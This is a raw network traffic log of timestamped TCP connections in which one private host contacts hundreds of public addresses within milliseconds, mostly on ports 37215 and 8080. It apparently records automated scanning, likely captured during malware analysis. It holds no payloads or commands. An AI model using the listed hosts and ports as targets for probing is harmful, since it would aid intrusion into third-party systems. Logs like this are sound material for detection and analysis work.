Nov 22, 2023 08:37:53.338937044 CET	80	41616	95.216.96.250	192.168.2.23
Nov 22, 2023 08:37:53.338984013 CET	41616	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.338995934 CET	41616	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.339001894 CET	41616	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.339018106 CET	41626	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.343519926 CET	8080	54329	31.134.100.79	192.168.2.23
Nov 22, 2023 08:37:53.343574047 CET	54329	8080	192.168.2.23	31.134.100.79
Nov 22, 2023 08:37:53.363513947 CET	59444	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:53.363814116 CET	8080	54329	94.43.3.214	192.168.2.23
Nov 22, 2023 08:37:53.387942076 CET	37215	54335	197.6.42.110	192.168.2.23
Nov 22, 2023 08:37:53.411062956 CET	80	35608	95.161.196.170	192.168.2.23
Nov 22, 2023 08:37:53.411123037 CET	35608	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.411185026 CET	35608	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.421196938 CET	80	35598	95.161.196.170	192.168.2.23
Nov 22, 2023 08:37:53.421211004 CET	80	35598	95.161.196.170	192.168.2.23
Nov 22, 2023 08:37:53.421266079 CET	35598	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.421266079 CET	35598	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.431483984 CET	51800	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:53.441771030 CET	54335	37215	192.168.2.23	41.110.29.11
Nov 22, 2023 08:37:53.441796064 CET	54335	37215	192.168.2.23	41.200.140.134
Nov 22, 2023 08:37:53.441823959 CET	54335	37215	192.168.2.23	41.180.49.34
Nov 22, 2023 08:37:53.441839933 CET	54335	37215	192.168.2.23	41.240.140.127
Nov 22, 2023 08:37:53.441854000 CET	54335	37215	192.168.2.23	41.185.137.228
Nov 22, 2023 08:37:53.441889048 CET	54335	37215	192.168.2.23	41.206.75.224
Nov 22, 2023 08:37:53.441895962 CET	54335	37215	192.168.2.23	41.124.120.185
Nov 22, 2023 08:37:53.441910982 CET	54335	37215	192.168.2.23	41.171.189.48
Nov 22, 2023 08:37:53.441945076 CET	54335	37215	192.168.2.23	41.208.255.163
Nov 22, 2023 08:37:53.441952944 CET	54335	37215	192.168.2.23	41.59.226.181
Nov 22, 2023 08:37:53.441961050 CET	54335	37215	192.168.2.23	41.219.156.207
Nov 22, 2023 08:37:53.441978931 CET	54335	37215	192.168.2.23	41.24.176.241
Nov 22, 2023 08:37:53.441998959 CET	54335	37215	192.168.2.23	41.11.24.145
Nov 22, 2023 08:37:53.442009926 CET	54335	37215	192.168.2.23	41.123.96.244
Nov 22, 2023 08:37:53.442042112 CET	54335	37215	192.168.2.23	41.101.112.209
Nov 22, 2023 08:37:53.442068100 CET	54335	37215	192.168.2.23	41.141.177.250
Nov 22, 2023 08:37:53.442101002 CET	54335	37215	192.168.2.23	41.86.80.83
Nov 22, 2023 08:37:53.442131996 CET	54335	37215	192.168.2.23	41.245.76.197
Nov 22, 2023 08:37:53.442132950 CET	54335	37215	192.168.2.23	41.242.200.90
Nov 22, 2023 08:37:53.442147017 CET	54335	37215	192.168.2.23	41.244.169.0
Nov 22, 2023 08:37:53.442154884 CET	54335	37215	192.168.2.23	41.38.162.122
Nov 22, 2023 08:37:53.442176104 CET	54335	37215	192.168.2.23	41.248.157.69
Nov 22, 2023 08:37:53.442187071 CET	54335	37215	192.168.2.23	41.170.94.201
Nov 22, 2023 08:37:53.442205906 CET	54335	37215	192.168.2.23	41.185.133.159
Nov 22, 2023 08:37:53.442231894 CET	54335	37215	192.168.2.23	41.233.217.143
Nov 22, 2023 08:37:53.442245007 CET	54335	37215	192.168.2.23	41.65.21.91
Nov 22, 2023 08:37:53.442265987 CET	54335	37215	192.168.2.23	41.97.228.237
Nov 22, 2023 08:37:53.442284107 CET	54335	37215	192.168.2.23	41.91.159.115
Nov 22, 2023 08:37:53.442298889 CET	54335	37215	192.168.2.23	41.80.255.4
Nov 22, 2023 08:37:53.442312002 CET	54335	37215	192.168.2.23	41.143.32.220
Nov 22, 2023 08:37:53.442328930 CET	54335	37215	192.168.2.23	41.101.185.47
Nov 22, 2023 08:37:53.442353010 CET	54335	37215	192.168.2.23	41.61.209.227
Nov 22, 2023 08:37:53.442383051 CET	54335	37215	192.168.2.23	41.103.172.145
Nov 22, 2023 08:37:53.442398071 CET	54335	37215	192.168.2.23	41.167.207.226
Nov 22, 2023 08:37:53.442440987 CET	54335	37215	192.168.2.23	41.161.80.212
Nov 22, 2023 08:37:53.442445040 CET	54335	37215	192.168.2.23	41.20.244.33
Nov 22, 2023 08:37:53.442445040 CET	54335	37215	192.168.2.23	41.93.29.54
Nov 22, 2023 08:37:53.442447901 CET	54335	37215	192.168.2.23	41.26.246.211
Nov 22, 2023 08:37:53.442467928 CET	54335	37215	192.168.2.23	41.115.111.46
Nov 22, 2023 08:37:53.442491055 CET	54335	37215	192.168.2.23	41.37.131.23
Nov 22, 2023 08:37:53.442500114 CET	54335	37215	192.168.2.23	41.182.139.138
Nov 22, 2023 08:37:53.442524910 CET	54335	37215	192.168.2.23	41.54.96.91
Nov 22, 2023 08:37:53.442543983 CET	54335	37215	192.168.2.23	41.103.194.194
Nov 22, 2023 08:37:53.442554951 CET	54335	37215	192.168.2.23	41.204.97.195
Nov 22, 2023 08:37:53.442589998 CET	54335	37215	192.168.2.23	41.250.142.8
Nov 22, 2023 08:37:53.442598104 CET	54335	37215	192.168.2.23	41.18.46.201
Nov 22, 2023 08:37:53.442610979 CET	54335	37215	192.168.2.23	41.145.93.36
Nov 22, 2023 08:37:53.442661047 CET	54335	37215	192.168.2.23	41.52.19.17
Nov 22, 2023 08:37:53.442663908 CET	54335	37215	192.168.2.23	41.100.25.148
Nov 22, 2023 08:37:53.442663908 CET	54335	37215	192.168.2.23	41.74.252.80
Nov 22, 2023 08:37:53.442688942 CET	54335	37215	192.168.2.23	41.166.54.148
Nov 22, 2023 08:37:53.442713022 CET	54335	37215	192.168.2.23	41.57.158.178
Nov 22, 2023 08:37:53.442742109 CET	54335	37215	192.168.2.23	41.125.162.90
Nov 22, 2023 08:37:53.442759037 CET	54335	37215	192.168.2.23	41.212.238.108
Nov 22, 2023 08:37:53.442769051 CET	54335	37215	192.168.2.23	41.61.92.137
Nov 22, 2023 08:37:53.442795038 CET	54335	37215	192.168.2.23	41.114.144.3
Nov 22, 2023 08:37:53.442817926 CET	54335	37215	192.168.2.23	41.232.223.66
Nov 22, 2023 08:37:53.442831993 CET	54335	37215	192.168.2.23	41.73.31.197
Nov 22, 2023 08:37:53.442852974 CET	54335	37215	192.168.2.23	41.59.223.236
Nov 22, 2023 08:37:53.442864895 CET	54335	37215	192.168.2.23	41.123.0.255
Nov 22, 2023 08:37:53.442886114 CET	54335	37215	192.168.2.23	41.110.34.90
Nov 22, 2023 08:37:53.442898989 CET	54335	37215	192.168.2.23	41.51.135.20
Nov 22, 2023 08:37:53.442919970 CET	54335	37215	192.168.2.23	41.72.255.147
Nov 22, 2023 08:37:53.442936897 CET	54335	37215	192.168.2.23	41.115.177.126
Nov 22, 2023 08:37:53.442960024 CET	54335	37215	192.168.2.23	41.12.229.183
Nov 22, 2023 08:37:53.442971945 CET	54335	37215	192.168.2.23	41.8.118.70
Nov 22, 2023 08:37:53.442991972 CET	54335	37215	192.168.2.23	41.205.161.25
Nov 22, 2023 08:37:53.443018913 CET	54335	37215	192.168.2.23	41.45.72.19
Nov 22, 2023 08:37:53.443020105 CET	54335	37215	192.168.2.23	41.184.23.83
Nov 22, 2023 08:37:53.443033934 CET	54335	37215	192.168.2.23	41.17.170.244
Nov 22, 2023 08:37:53.443074942 CET	54335	37215	192.168.2.23	41.48.177.36
Nov 22, 2023 08:37:53.443074942 CET	54335	37215	192.168.2.23	41.91.138.24
Nov 22, 2023 08:37:53.443084955 CET	54335	37215	192.168.2.23	41.182.101.252
Nov 22, 2023 08:37:53.443106890 CET	54335	37215	192.168.2.23	41.181.210.119
Nov 22, 2023 08:37:53.443133116 CET	54335	37215	192.168.2.23	41.94.126.131
Nov 22, 2023 08:37:53.443147898 CET	54335	37215	192.168.2.23	41.146.85.112
Nov 22, 2023 08:37:53.443160057 CET	54335	37215	192.168.2.23	41.156.245.95
Nov 22, 2023 08:37:53.443183899 CET	54335	37215	192.168.2.23	41.51.86.180
Nov 22, 2023 08:37:53.443212032 CET	54335	37215	192.168.2.23	41.76.74.53
Nov 22, 2023 08:37:53.443212032 CET	54335	37215	192.168.2.23	41.54.145.20
Nov 22, 2023 08:37:53.443228960 CET	54335	37215	192.168.2.23	41.129.58.197
Nov 22, 2023 08:37:53.443240881 CET	54335	37215	192.168.2.23	41.162.83.168
Nov 22, 2023 08:37:53.443262100 CET	54335	37215	192.168.2.23	41.26.66.160
Nov 22, 2023 08:37:53.443279028 CET	54335	37215	192.168.2.23	41.70.143.241
Nov 22, 2023 08:37:53.443294048 CET	54335	37215	192.168.2.23	41.139.141.228
Nov 22, 2023 08:37:53.443314075 CET	54335	37215	192.168.2.23	41.60.112.126
Nov 22, 2023 08:37:53.443329096 CET	54335	37215	192.168.2.23	41.238.98.193
Nov 22, 2023 08:37:53.443340063 CET	54335	37215	192.168.2.23	41.79.69.202
Nov 22, 2023 08:37:53.443375111 CET	54335	37215	192.168.2.23	41.240.62.1
Nov 22, 2023 08:37:53.443393946 CET	54335	37215	192.168.2.23	41.201.85.220
Nov 22, 2023 08:37:53.443403006 CET	54335	37215	192.168.2.23	41.128.48.217
Nov 22, 2023 08:37:53.443423986 CET	54335	37215	192.168.2.23	41.21.34.145
Nov 22, 2023 08:37:53.443454981 CET	54335	37215	192.168.2.23	41.182.70.56
Nov 22, 2023 08:37:53.443470001 CET	54335	37215	192.168.2.23	41.115.224.2
Nov 22, 2023 08:37:53.443485022 CET	54335	37215	192.168.2.23	41.106.92.52
Nov 22, 2023 08:37:53.443505049 CET	54335	37215	192.168.2.23	41.228.241.195
Nov 22, 2023 08:37:53.443509102 CET	54335	37215	192.168.2.23	41.86.161.54
Nov 22, 2023 08:37:53.443536043 CET	54335	37215	192.168.2.23	41.226.228.207
Nov 22, 2023 08:37:53.443583965 CET	54335	37215	192.168.2.23	41.95.131.200
Nov 22, 2023 08:37:53.443583965 CET	54335	37215	192.168.2.23	41.36.178.156
Nov 22, 2023 08:37:53.443583965 CET	54335	37215	192.168.2.23	41.79.139.210
Nov 22, 2023 08:37:53.443602085 CET	54335	37215	192.168.2.23	41.59.220.209
Nov 22, 2023 08:37:53.443619967 CET	54335	37215	192.168.2.23	41.80.140.84
Nov 22, 2023 08:37:53.443650961 CET	54335	37215	192.168.2.23	41.59.158.219
Nov 22, 2023 08:37:53.443671942 CET	54335	37215	192.168.2.23	41.43.220.184
Nov 22, 2023 08:37:53.443689108 CET	54335	37215	192.168.2.23	41.24.52.93
Nov 22, 2023 08:37:53.443707943 CET	54335	37215	192.168.2.23	41.96.104.110
Nov 22, 2023 08:37:53.443722010 CET	54335	37215	192.168.2.23	41.102.201.130
Nov 22, 2023 08:37:53.443734884 CET	54335	37215	192.168.2.23	41.139.238.26
Nov 22, 2023 08:37:53.443754911 CET	54335	37215	192.168.2.23	41.85.202.140
Nov 22, 2023 08:37:53.443769932 CET	54335	37215	192.168.2.23	41.233.190.175
Nov 22, 2023 08:37:53.443785906 CET	54335	37215	192.168.2.23	41.26.189.210
Nov 22, 2023 08:37:53.443798065 CET	54335	37215	192.168.2.23	41.221.103.76
Nov 22, 2023 08:37:53.443819046 CET	54335	37215	192.168.2.23	41.97.18.91
Nov 22, 2023 08:37:53.443834066 CET	54335	37215	192.168.2.23	41.190.255.127
Nov 22, 2023 08:37:53.443846941 CET	54335	37215	192.168.2.23	41.229.112.201
Nov 22, 2023 08:37:53.443866014 CET	54335	37215	192.168.2.23	41.13.14.103
Nov 22, 2023 08:37:53.443892002 CET	54335	37215	192.168.2.23	41.94.35.199
Nov 22, 2023 08:37:53.443922997 CET	54335	37215	192.168.2.23	41.53.217.237
Nov 22, 2023 08:37:53.443941116 CET	54335	37215	192.168.2.23	41.101.57.213
Nov 22, 2023 08:37:53.443942070 CET	54335	37215	192.168.2.23	41.215.106.156
Nov 22, 2023 08:37:53.443950891 CET	54335	37215	192.168.2.23	41.10.87.6
Nov 22, 2023 08:37:53.443967104 CET	54335	37215	192.168.2.23	41.41.156.87
Nov 22, 2023 08:37:53.443985939 CET	54335	37215	192.168.2.23	41.158.196.214
Nov 22, 2023 08:37:53.443996906 CET	54335	37215	192.168.2.23	41.16.165.192
Nov 22, 2023 08:37:53.444006920 CET	54335	37215	192.168.2.23	41.153.106.190
Nov 22, 2023 08:37:53.444024086 CET	54335	37215	192.168.2.23	41.48.246.57
Nov 22, 2023 08:37:53.444039106 CET	54335	37215	192.168.2.23	41.61.175.211
Nov 22, 2023 08:37:53.444061995 CET	54335	37215	192.168.2.23	41.42.154.103
Nov 22, 2023 08:37:53.444072962 CET	54335	37215	192.168.2.23	41.133.220.218
Nov 22, 2023 08:37:53.444143057 CET	54335	37215	192.168.2.23	41.74.0.82
Nov 22, 2023 08:37:53.444185019 CET	54335	37215	192.168.2.23	41.235.71.117
Nov 22, 2023 08:37:53.444185972 CET	54335	37215	192.168.2.23	41.83.94.13
Nov 22, 2023 08:37:53.444185972 CET	54335	37215	192.168.2.23	41.252.71.43
Nov 22, 2023 08:37:53.444188118 CET	54335	37215	192.168.2.23	41.84.97.69
Nov 22, 2023 08:37:53.444205999 CET	54335	37215	192.168.2.23	41.5.235.65
Nov 22, 2023 08:37:53.444226980 CET	54335	37215	192.168.2.23	41.15.52.169
Nov 22, 2023 08:37:53.444253922 CET	54335	37215	192.168.2.23	41.195.79.36
Nov 22, 2023 08:37:53.444258928 CET	54335	37215	192.168.2.23	41.199.59.166
Nov 22, 2023 08:37:53.444278955 CET	54335	37215	192.168.2.23	41.87.121.19
Nov 22, 2023 08:37:53.444308043 CET	54335	37215	192.168.2.23	41.168.162.232
Nov 22, 2023 08:37:53.444320917 CET	54335	37215	192.168.2.23	41.99.96.239
Nov 22, 2023 08:37:53.444338083 CET	54335	37215	192.168.2.23	41.125.82.99
Nov 22, 2023 08:37:53.444351912 CET	54335	37215	192.168.2.23	41.57.129.88
Nov 22, 2023 08:37:53.444372892 CET	54335	37215	192.168.2.23	41.114.184.125
Nov 22, 2023 08:37:53.444394112 CET	54335	37215	192.168.2.23	41.197.35.123
Nov 22, 2023 08:37:53.444406986 CET	54335	37215	192.168.2.23	41.149.43.40
Nov 22, 2023 08:37:53.444431067 CET	54335	37215	192.168.2.23	41.27.226.74
Nov 22, 2023 08:37:53.444446087 CET	54335	37215	192.168.2.23	41.148.189.117
Nov 22, 2023 08:37:53.444458961 CET	54335	37215	192.168.2.23	41.204.217.107
Nov 22, 2023 08:37:53.444475889 CET	54335	37215	192.168.2.23	41.89.87.140
Nov 22, 2023 08:37:53.444498062 CET	54335	37215	192.168.2.23	41.107.21.228
Nov 22, 2023 08:37:53.444526911 CET	54335	37215	192.168.2.23	41.187.0.31
Nov 22, 2023 08:37:53.444536924 CET	54335	37215	192.168.2.23	41.77.53.72
Nov 22, 2023 08:37:53.444540024 CET	54335	37215	192.168.2.23	41.213.157.102
Nov 22, 2023 08:37:53.444560051 CET	54335	37215	192.168.2.23	41.193.98.49
Nov 22, 2023 08:37:53.444612980 CET	54335	37215	192.168.2.23	41.237.160.114
Nov 22, 2023 08:37:53.444633961 CET	54335	37215	192.168.2.23	41.239.117.17
Nov 22, 2023 08:37:53.444649935 CET	54335	37215	192.168.2.23	41.190.242.109
Nov 22, 2023 08:37:53.444660902 CET	54335	37215	192.168.2.23	41.28.34.51
Nov 22, 2023 08:37:53.459450960 CET	36898	8080	192.168.2.23	31.136.219.234
Nov 22, 2023 08:37:53.459454060 CET	54618	8080	192.168.2.23	62.113.230.74
Nov 22, 2023 08:37:53.491543055 CET	38768	8080	192.168.2.23	31.136.130.132
Nov 22, 2023 08:37:53.491543055 CET	59454	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:53.503489971 CET	80	43628	95.101.247.189	192.168.2.23
Nov 22, 2023 08:37:53.503542900 CET	43628	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.503572941 CET	43628	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.507090092 CET	80	43618	95.101.247.189	192.168.2.23
Nov 22, 2023 08:37:53.507591009 CET	80	43618	95.101.247.189	192.168.2.23
Nov 22, 2023 08:37:53.507637024 CET	43618	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.507837057 CET	80	43618	95.101.247.189	192.168.2.23
Nov 22, 2023 08:37:53.507880926 CET	43618	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.519366980 CET	80	53406	95.100.224.246	192.168.2.23
Nov 22, 2023 08:37:53.519414902 CET	53406	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.519431114 CET	53406	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.519582033 CET	80	53398	95.100.224.246	192.168.2.23
Nov 22, 2023 08:37:53.519680023 CET	80	53398	95.100.224.246	192.168.2.23
Nov 22, 2023 08:37:53.519722939 CET	53398	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.519783974 CET	80	53398	95.100.224.246	192.168.2.23
Nov 22, 2023 08:37:53.519831896 CET	53398	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.520504951 CET	80	38100	95.100.227.33	192.168.2.23
Nov 22, 2023 08:37:53.520546913 CET	38100	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.520558119 CET	38100	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.528112888 CET	80	38088	95.100.227.33	192.168.2.23
Nov 22, 2023 08:37:53.528388023 CET	80	38088	95.100.227.33	192.168.2.23
Nov 22, 2023 08:37:53.528429031 CET	38088	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.528439999 CET	80	38088	95.100.227.33	192.168.2.23
Nov 22, 2023 08:37:53.528480053 CET	38088	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.533468008 CET	80	41616	95.216.96.250	192.168.2.23
Nov 22, 2023 08:37:53.533642054 CET	80	41616	95.216.96.250	192.168.2.23
Nov 22, 2023 08:37:53.533654928 CET	80	41616	95.216.96.250	192.168.2.23
Nov 22, 2023 08:37:53.533682108 CET	41616	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.533682108 CET	41616	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.533880949 CET	80	41626	95.216.96.250	192.168.2.23
Nov 22, 2023 08:37:53.533930063 CET	41626	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.533962011 CET	41626	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.600790977 CET	8080	54329	31.217.91.121	192.168.2.23
Nov 22, 2023 08:37:53.623850107 CET	80	54328	112.221.111.81	192.168.2.23
Nov 22, 2023 08:37:53.626360893 CET	80	54328	112.204.29.227	192.168.2.23
Nov 22, 2023 08:37:53.627160072 CET	80	54328	112.205.76.234	192.168.2.23
Nov 22, 2023 08:37:53.628510952 CET	80	54328	112.159.163.54	192.168.2.23
Nov 22, 2023 08:37:53.642570019 CET	8080	54618	62.113.230.74	192.168.2.23
Nov 22, 2023 08:37:53.642596960 CET	8080	54329	95.198.172.194	192.168.2.23
Nov 22, 2023 08:37:53.642643929 CET	54618	8080	192.168.2.23	62.113.230.74
Nov 22, 2023 08:37:53.643122911 CET	8080	36898	31.136.219.234	192.168.2.23
Nov 22, 2023 08:37:53.643184900 CET	36898	8080	192.168.2.23	31.136.219.234
Nov 22, 2023 08:37:53.644079924 CET	54329	8080	192.168.2.23	94.121.89.37
Nov 22, 2023 08:37:53.644088030 CET	54329	8080	192.168.2.23	62.25.153.147
Nov 22, 2023 08:37:53.644104958 CET	54329	8080	192.168.2.23	31.252.146.136
Nov 22, 2023 08:37:53.644114017 CET	54329	8080	192.168.2.23	62.84.164.82
Nov 22, 2023 08:37:53.644117117 CET	54329	8080	192.168.2.23	31.225.186.164
Nov 22, 2023 08:37:53.644128084 CET	54329	8080	192.168.2.23	94.119.147.120
Nov 22, 2023 08:37:53.644135952 CET	54329	8080	192.168.2.23	94.137.135.158
Nov 22, 2023 08:37:53.644136906 CET	54329	8080	192.168.2.23	95.244.126.78
Nov 22, 2023 08:37:53.644136906 CET	54329	8080	192.168.2.23	31.146.92.196
Nov 22, 2023 08:37:53.644136906 CET	54329	8080	192.168.2.23	62.25.54.17
Nov 22, 2023 08:37:53.644149065 CET	54329	8080	192.168.2.23	94.131.108.243
Nov 22, 2023 08:37:53.644150972 CET	54329	8080	192.168.2.23	94.67.243.69
Nov 22, 2023 08:37:53.644160986 CET	54329	8080	192.168.2.23	62.116.126.251
Nov 22, 2023 08:37:53.644171000 CET	54329	8080	192.168.2.23	94.90.49.145
Nov 22, 2023 08:37:53.644171000 CET	54329	8080	192.168.2.23	62.174.218.100
Nov 22, 2023 08:37:53.644171000 CET	54329	8080	192.168.2.23	31.78.145.222
Nov 22, 2023 08:37:53.644171000 CET	54329	8080	192.168.2.23	62.171.53.57
Nov 22, 2023 08:37:53.644185066 CET	54329	8080	192.168.2.23	62.230.17.236
Nov 22, 2023 08:37:53.644197941 CET	54329	8080	192.168.2.23	94.251.117.131
Nov 22, 2023 08:37:53.644201040 CET	54329	8080	192.168.2.23	62.34.219.202
Nov 22, 2023 08:37:53.644217014 CET	54329	8080	192.168.2.23	62.3.145.248
Nov 22, 2023 08:37:53.644220114 CET	54329	8080	192.168.2.23	85.172.112.128
Nov 22, 2023 08:37:53.644224882 CET	54329	8080	192.168.2.23	31.73.85.141
Nov 22, 2023 08:37:53.644224882 CET	54329	8080	192.168.2.23	31.159.171.188
Nov 22, 2023 08:37:53.644224882 CET	54329	8080	192.168.2.23	95.74.97.130
Nov 22, 2023 08:37:53.644231081 CET	54329	8080	192.168.2.23	94.193.109.233
Nov 22, 2023 08:37:53.644233942 CET	54329	8080	192.168.2.23	31.9.195.55
Nov 22, 2023 08:37:53.644243956 CET	54329	8080	192.168.2.23	31.131.183.181
Nov 22, 2023 08:37:53.644244909 CET	54329	8080	192.168.2.23	31.242.37.38
Nov 22, 2023 08:37:53.644259930 CET	54329	8080	192.168.2.23	85.250.129.163
Nov 22, 2023 08:37:53.644264936 CET	54329	8080	192.168.2.23	62.10.247.174
Nov 22, 2023 08:37:53.644268036 CET	54329	8080	192.168.2.23	85.112.231.151
Nov 22, 2023 08:37:53.644284010 CET	54329	8080	192.168.2.23	95.5.240.24
Nov 22, 2023 08:37:53.644284964 CET	54329	8080	192.168.2.23	31.209.232.109
Nov 22, 2023 08:37:53.644293070 CET	54329	8080	192.168.2.23	94.107.7.19
Nov 22, 2023 08:37:53.644293070 CET	54329	8080	192.168.2.23	31.236.207.228
Nov 22, 2023 08:37:53.644303083 CET	54329	8080	192.168.2.23	31.75.216.118
Nov 22, 2023 08:37:53.644311905 CET	54329	8080	192.168.2.23	94.114.36.52
Nov 22, 2023 08:37:53.644313097 CET	54329	8080	192.168.2.23	94.248.24.139
Nov 22, 2023 08:37:53.644315004 CET	54329	8080	192.168.2.23	85.246.2.81
Nov 22, 2023 08:37:53.644334078 CET	54329	8080	192.168.2.23	31.64.63.234
Nov 22, 2023 08:37:53.644335032 CET	54329	8080	192.168.2.23	95.31.237.68
Nov 22, 2023 08:37:53.644334078 CET	54329	8080	192.168.2.23	94.176.222.70
Nov 22, 2023 08:37:53.644334078 CET	54329	8080	192.168.2.23	85.39.33.45
Nov 22, 2023 08:37:53.644340992 CET	54329	8080	192.168.2.23	31.114.68.252
Nov 22, 2023 08:37:53.644351959 CET	54329	8080	192.168.2.23	94.70.45.138
Nov 22, 2023 08:37:53.644352913 CET	54329	8080	192.168.2.23	85.147.92.185
Nov 22, 2023 08:37:53.644361019 CET	54329	8080	192.168.2.23	31.1.55.178
Nov 22, 2023 08:37:53.644367933 CET	54329	8080	192.168.2.23	62.232.213.72
Nov 22, 2023 08:37:53.644368887 CET	54329	8080	192.168.2.23	31.225.130.49
Nov 22, 2023 08:37:53.644368887 CET	54329	8080	192.168.2.23	31.181.228.169
Nov 22, 2023 08:37:53.644368887 CET	54329	8080	192.168.2.23	95.57.229.21
Nov 22, 2023 08:37:53.644368887 CET	54329	8080	192.168.2.23	94.153.101.127
Nov 22, 2023 08:37:53.644372940 CET	54329	8080	192.168.2.23	62.182.138.63
Nov 22, 2023 08:37:53.644383907 CET	54329	8080	192.168.2.23	31.33.100.124
Nov 22, 2023 08:37:53.644383907 CET	54329	8080	192.168.2.23	62.154.204.121
Nov 22, 2023 08:37:53.644396067 CET	54329	8080	192.168.2.23	62.182.95.63
Nov 22, 2023 08:37:53.644396067 CET	54329	8080	192.168.2.23	31.43.172.215
Nov 22, 2023 08:37:53.644409895 CET	54329	8080	192.168.2.23	94.99.232.70
Nov 22, 2023 08:37:53.644412994 CET	54329	8080	192.168.2.23	94.135.142.54
Nov 22, 2023 08:37:53.644414902 CET	54329	8080	192.168.2.23	62.124.93.50
Nov 22, 2023 08:37:53.644414902 CET	54329	8080	192.168.2.23	95.68.71.147
Nov 22, 2023 08:37:53.644423008 CET	54329	8080	192.168.2.23	94.186.126.16
Nov 22, 2023 08:37:53.644423008 CET	54329	8080	192.168.2.23	94.37.81.139
Nov 22, 2023 08:37:53.644424915 CET	54329	8080	192.168.2.23	85.34.184.73
Nov 22, 2023 08:37:53.644434929 CET	54329	8080	192.168.2.23	95.76.123.121
Nov 22, 2023 08:37:53.644440889 CET	54329	8080	192.168.2.23	95.146.82.179
Nov 22, 2023 08:37:53.644443035 CET	54329	8080	192.168.2.23	85.81.171.185
Nov 22, 2023 08:37:53.644443035 CET	54329	8080	192.168.2.23	85.197.252.84
Nov 22, 2023 08:37:53.644443035 CET	54329	8080	192.168.2.23	94.0.72.217
Nov 22, 2023 08:37:53.644458055 CET	54329	8080	192.168.2.23	62.249.141.83
Nov 22, 2023 08:37:53.644463062 CET	54329	8080	192.168.2.23	95.92.220.39
Nov 22, 2023 08:37:53.644464016 CET	54329	8080	192.168.2.23	62.32.223.169
Nov 22, 2023 08:37:53.644464970 CET	54329	8080	192.168.2.23	31.167.57.136
Nov 22, 2023 08:37:53.644479990 CET	54329	8080	192.168.2.23	95.61.30.195
Nov 22, 2023 08:37:53.644484043 CET	54329	8080	192.168.2.23	62.217.220.49
Nov 22, 2023 08:37:53.644484043 CET	54329	8080	192.168.2.23	95.3.191.84
Nov 22, 2023 08:37:53.644490004 CET	54329	8080	192.168.2.23	94.183.181.73
Nov 22, 2023 08:37:53.644503117 CET	54329	8080	192.168.2.23	95.190.17.188
Nov 22, 2023 08:37:53.644503117 CET	54329	8080	192.168.2.23	85.197.107.94
Nov 22, 2023 08:37:53.644510031 CET	54329	8080	192.168.2.23	31.49.11.44
Nov 22, 2023 08:37:53.644515991 CET	54329	8080	192.168.2.23	31.121.120.226
Nov 22, 2023 08:37:53.644531965 CET	54329	8080	192.168.2.23	95.244.150.231
Nov 22, 2023 08:37:53.644546986 CET	54329	8080	192.168.2.23	85.176.241.11
Nov 22, 2023 08:37:53.644547939 CET	54329	8080	192.168.2.23	31.209.100.123
Nov 22, 2023 08:37:53.644558907 CET	54329	8080	192.168.2.23	31.83.26.92
Nov 22, 2023 08:37:53.644558907 CET	54329	8080	192.168.2.23	62.14.185.217
Nov 22, 2023 08:37:53.644567013 CET	54329	8080	192.168.2.23	62.25.13.50
Nov 22, 2023 08:37:53.644567013 CET	54329	8080	192.168.2.23	31.126.192.146
Nov 22, 2023 08:37:53.644570112 CET	54329	8080	192.168.2.23	62.107.22.55
Nov 22, 2023 08:37:53.644570112 CET	54329	8080	192.168.2.23	85.186.166.37
Nov 22, 2023 08:37:53.644572020 CET	54329	8080	192.168.2.23	95.184.97.211
Nov 22, 2023 08:37:53.644578934 CET	54329	8080	192.168.2.23	31.199.110.22
Nov 22, 2023 08:37:53.644591093 CET	54329	8080	192.168.2.23	85.249.109.22
Nov 22, 2023 08:37:53.644591093 CET	54329	8080	192.168.2.23	95.75.14.60
Nov 22, 2023 08:37:53.644608974 CET	54329	8080	192.168.2.23	31.222.176.228
Nov 22, 2023 08:37:53.644612074 CET	54329	8080	192.168.2.23	31.158.77.77
Nov 22, 2023 08:37:53.644612074 CET	54329	8080	192.168.2.23	95.3.27.227
Nov 22, 2023 08:37:53.644613028 CET	54329	8080	192.168.2.23	85.214.57.229
Nov 22, 2023 08:37:53.644623995 CET	54329	8080	192.168.2.23	62.39.157.233
Nov 22, 2023 08:37:53.644625902 CET	54329	8080	192.168.2.23	31.99.148.228
Nov 22, 2023 08:37:53.644629955 CET	54329	8080	192.168.2.23	31.227.90.188
Nov 22, 2023 08:37:53.644629955 CET	54329	8080	192.168.2.23	85.253.158.80
Nov 22, 2023 08:37:53.644635916 CET	54329	8080	192.168.2.23	94.11.26.152
Nov 22, 2023 08:37:53.644642115 CET	54329	8080	192.168.2.23	85.145.247.190
Nov 22, 2023 08:37:53.644653082 CET	54329	8080	192.168.2.23	31.149.251.134
Nov 22, 2023 08:37:53.644654989 CET	54329	8080	192.168.2.23	62.242.4.180
Nov 22, 2023 08:37:53.644654989 CET	54329	8080	192.168.2.23	95.211.80.173
Nov 22, 2023 08:37:53.644656897 CET	54329	8080	192.168.2.23	31.35.70.37
Nov 22, 2023 08:37:53.644673109 CET	54329	8080	192.168.2.23	31.194.232.12
